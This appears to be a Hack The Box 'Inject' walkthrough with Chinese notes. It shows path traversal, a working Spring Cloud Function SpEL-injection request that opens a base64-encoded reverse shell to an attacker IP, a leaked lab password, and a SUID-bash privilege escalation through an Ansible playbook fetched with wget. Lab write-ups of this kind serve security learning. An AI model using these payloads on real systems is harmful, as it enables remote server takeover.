Inject — Hack The Box Machine

sudo openvpn lab_Wreath0690.ovpn

10.10.11.204

# 初始端口扫描
nmap -A 10.10.11.204

# 仅有 22/tcp 和 8080/tcp 两个端口是开放的，其中22/tcp 端口运行的是 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)，8080/tcp 端口运行的是 Nagios NSCA

touch png.png
# 创建一个文件进行抓包

密码：DocPhillovestoInject123
用户：phil

# ssh phil@10.10.11.204，连接不上

# 执行命令 curl http://10.10.11.204:8080/show_image?img=pass1.jpg?pass=id 得到了文件的绝对路径
/var/www/WebApp/src/main/uploads/pass1.jpg%3Fpass=id

{"timestamp":"2023-05-19T02:46:22.638+00:00","status":500,"error":"Internal Server Error","message":"URL [file:/var/www/WebApp/src/main/uploads/pass1.jpg%3Fpass=id] cannot be resolved in the file system for checking its content length","path":"/show_image"}root@aloof-virtual-machine:/home/aloof/tools# 

curl http://10.10.11.204:8080/show_image?img=../../../../WebApp/pom.xml

# 返回信息，版本满足要求
<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-parent</artifactId>
		<version>2.6.5</version>
		<relativePath/> <!-- lookup parent from repository -->

GET / HTTP/1.1
Host: 10.10.11.204:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4

test

bash -i >& /dev/tcp/10.10.16.39/9001 0>&1
# 通过 base64 加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zOS85MDAxIDA+JjE=
# 监听端口，获得 shell 权限
nc -nvlp 9001

POST /functionRouter HTTP/1.1
Host: 10.10.11.204:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zOS85MDAxIDA+JjE=}|{base64,-d}|{bash,-i}")
Content-Type: text/plain
Content-Length: 4

test

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zOS85MDAxIDA+JjE=}|{base64,-d}|{bash,-i}")

# 这段代码是一个 HTTP 请求头的参数，它的名字是 spring.cloud.function.routing-expression，它的值是一个SpEL表达式。SpEL表达式是一种可以执行任意Java代码的语言.

# 这个SpEL表达式的作用是调用java.lang.Runtime类的getRuntime()方法，得到一个Runtime对象，然后调用它的exec()方法，执行一个命令行。这个命令行是我们自己可以控制的地方

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zOS85MDAxIDA+JjE=}|{base64,-d}|{bash,-i}

# 这个命令行的作用是先用 echo 命令输出一串 base64 编码的字符串，然后用 base64 命令解码它，然后用 bash 命令执行它


bash -i >& /dev/tcp/10.10.16.39/9001 0>&1

# 这个命令的作用是启动一个交互式的 bash shell，并且把它的输入和输出重定向到一个TCP连接上，连接的目标地址是 10.10.16.39:9001。这样就相当于在服务器上开启了一个反向 shell，攻击者可以在 10.10.16.39:9001 上监听并控制服务器。

# 所以，这段代码的目的是利用 Spring Cloud Function 框架中存在的 SpEL 注入漏洞，执行任意代码，并在服务器上开启一个反向 shell，从而获取服务器的完全控制权。

# 连接上之后，通过 whoami 命令发现当前用户是 frank，切换到 phil 用户

密码：DocPhillovestoInject123
用户：phil

su phil

# 在 /home/phil 目录下发现 user.txt 文件，用 cat 读取文件

- hosts: localhost
  tasks:
  - name: getroot
    command: sudo chmod u+s /bin/bash

ifconfig

# 用sudo权限运行python3的http.server模块1，它可以在本地主机上启动一个简单的HTTP服务器，用来共享文件和目录。
sudo python3 -m http.server

# 用wget命令从10.10.16.39:8000这个地址下载playbook_2.yml文件，这个地址是上面的HTTP服务器提供的。
wget 10.10.16.39:8000/playbook_2.yml

bash -p

id 


whoami

cd /root

ls

cat root.txt